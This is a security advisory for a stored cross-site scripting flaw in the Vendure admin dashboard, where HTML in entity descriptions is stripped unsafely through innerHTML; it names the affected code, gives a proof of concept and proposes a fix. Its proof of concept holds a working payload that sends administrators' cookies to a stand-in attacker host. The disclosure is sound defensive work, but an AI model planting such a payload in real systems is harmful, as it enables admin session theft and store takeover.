PT-2026-95051 · Npm · @Vendure/Dashboard

Publicado

2026-09-17

·

Atualizado

2026-09-17

CVSS v3.1

8.7

Alta

VetorAV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions

Package: @vendure/dashboard (vendure-ecommerce/vendure, latest master) ·

Summary

The dashboard's RichTextDescriptionCell "strips HTML" from an entity's description by assigning it to a live element's innerHTML and reading back textContent. This pattern still executes active markup: a description containing <img src=x onerror=…> runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing onerror). Because description is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a higher-privilege administrator's browser when they open the corresponding list — stored XSS leading to admin-session compromise.

Vulnerable code

packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx
tsx
export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => {
  const value = cell.getValue();
  const textContent = useMemo(() => {
    if (!value) return '';
    const div = document.createElement('div');
    div.innerHTML = value;     // line 51 — parses/loads active markup; <img onerror> fires here
    return div.textContent ?? '';  // line 52 — reading textContent does NOT undo the side effect
  }, [value]);
  ...
}
innerHTML does not run <script>, but it does trigger resource loads / event handlers such as <img src=x onerror=...>, <image>, <svg> handlers — even on a detached element — so the assignment itself is the sink. Reading textContent afterwards is irrelevant; the handler has already executed.

Reachable from (all use this cell for the description column)

  • products/products.tsx:53, collections/collections.tsx, promotions/promotions.tsx:62, payment-methods/payment-methods.tsx:57, shipping-methods/shipping-methods.tsx:39.
All of these are description fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes channel-scoped admins.

Proof of concept

  1. As an administrator with UpdateCatalog/UpdateProduct (e.g. a channel-scoped admin), set a Product's description to: <img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))">
  2. Any administrator who opens the Products list in the dashboard renders RichTextDescriptionCell for that row → div.innerHTML = description → the onerror executes in their session.
  3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → cross-privilege / cross-channel admin takeover (chains directly with the channel-scoping IDOR class already reported).

Impact

Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.

Suggested fix

Strip HTML with an inert parser (no script/resource execution) instead of a live element, or sanitize before display:
ts
// inert: DOMParser documents do not execute scripts or load resources
const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? '';
(Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other element.innerHTML = <untrusted> assignments used for "stripping".

Correção

XSS

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

GHSA-XHQ9-WHGQ-49J5

Produtos afetados

@Vendure/Dashboard